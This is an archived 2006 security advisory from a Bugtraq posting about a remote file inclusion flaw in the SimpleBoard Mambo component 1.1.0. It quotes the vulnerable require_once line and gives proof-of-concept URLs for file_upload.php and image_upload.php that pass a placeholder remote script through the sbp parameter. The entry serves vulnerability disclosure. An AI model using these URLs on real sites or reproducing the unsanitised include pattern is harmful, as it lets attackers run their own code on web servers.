SimpleBoard-1.1.0.txt

2006-10-02T00:00:00
ID PACKETSTORM:50337
Type packetstorm
Reporter worlddefacers.de
Modified 2006-10-02T00:00:00

Description

                                        
                                            `Hello,  
  
the same problem is in the File image_upload.php:  
http://website.com/components/com_simpleboard/image_upload.php?sbp=[evil_script]  
  
Best Regards,  
Christian Haeussler  
  
  
-----Ursprüngliche Nachricht-----  
Von: stormhacker@hotmail.com [mailto:stormhacker@hotmail.com]   
Gesendet: Sonntag, 10. September 2006 00:56  
An: bugtraq@securityfocus.com  
Betreff: SimpleBoard Mambo Component 1.1.0 Remote File Include  
  
[W]orld [D]efacers Team  
  
======================================  
  
--------------------Summary----------------  
  
eVuln ID: WD23  
  
Vendor: SimpleBoard Mambo Component 1.1.0  
  
Vendor's Web Site: mamboxchange.com/projects/simpleboard  
  
Class: Remote  
  
PoC/Exploit: Available  
  
Solution: Not Available  
  
Discovered by: rUnViRuS (worlddefacers.de)  
  
-----------------Description---------------  
  
require_once("$sbp/sb_helpers.php");  
  
  
--------------PoC/Exploit----------------------  
  
http://website.com/components/com_simpleboard/file_upload.php?sbp=[evil_script]  
  
--------------Solution---------------------  
  
No Patch available.  
  
--------------Credit-----------------------  
  
Discovered by: rUnViRuS (worlddefacers.de)  
  
`